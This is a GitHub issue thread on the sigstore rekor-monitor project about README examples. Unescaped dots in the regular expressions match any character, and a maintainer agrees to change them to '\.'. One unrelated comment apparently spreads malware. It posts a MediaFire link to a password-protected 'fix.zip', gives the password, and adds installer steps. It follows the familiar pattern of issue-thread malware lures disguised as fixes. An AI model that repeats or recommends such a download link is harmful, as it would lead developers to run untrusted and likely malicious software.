### ISSUE TITLE
Wrong description on README?

### ISSUE THREAD

**Issue by richardfan1126** [sigstore/rekor-monitor#442]
**Question**

https://github.com/sigstore/rekor-monitor/blob/bf3d7aea4fe61ecae266a88e498f490b22709726/pkg/rekor/identity.go#L147
https://github.com/sigstore/rekor-monitor/blob/bf3d7aea4fe61ecae266a88e498f490b22709726/pkg/rekor/identity.go#L288
https://github.com/sigstore/rekor-monitor/blob/bf3d7aea4fe61ecae266a88e498f490b22709726/pkg/rekor/identity.go#L306

We use regular expression to match the expected issuer and subject

And according to https://github.com/google/re2/wiki/Syntax, `.` means **any character**, instead of a literal `.`

So in the following description: https://github.com/sigstore/rekor-monitor/blob/bf3d7aea4fe61ecae266a88e498f490b22709726/README.md?plain=1#L67-L84

Should it changed to follow??

* Entries that contain a certificate whose SAN is `user@domain` **[any character]** `com`
* Entries whose SAN is `otheruser@domain` **[any character]** `com` and the OIDC provider specified in a [custom extension](https://github.com/sigstore/fulcio/blob/main/docs/oid-info.md#1361415726418--issuer-v2) matches one of the specified issuers (`https://accounts` **[any character]** `google` **[any character]** `com`  or `https://github` **[any character]** `com/login` in this example) 
* Non-certificate entries, such as PGP or SSH keys, whose subject matches `subject@domain` **[any character]** `com`

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by richardfan1126** [comment]
@haydentherapper

**Comment by haydentherapper** [comment]
Hey, good catch! We should update the readme to use `\.` matching a period rather than any character, as that is the intended example.
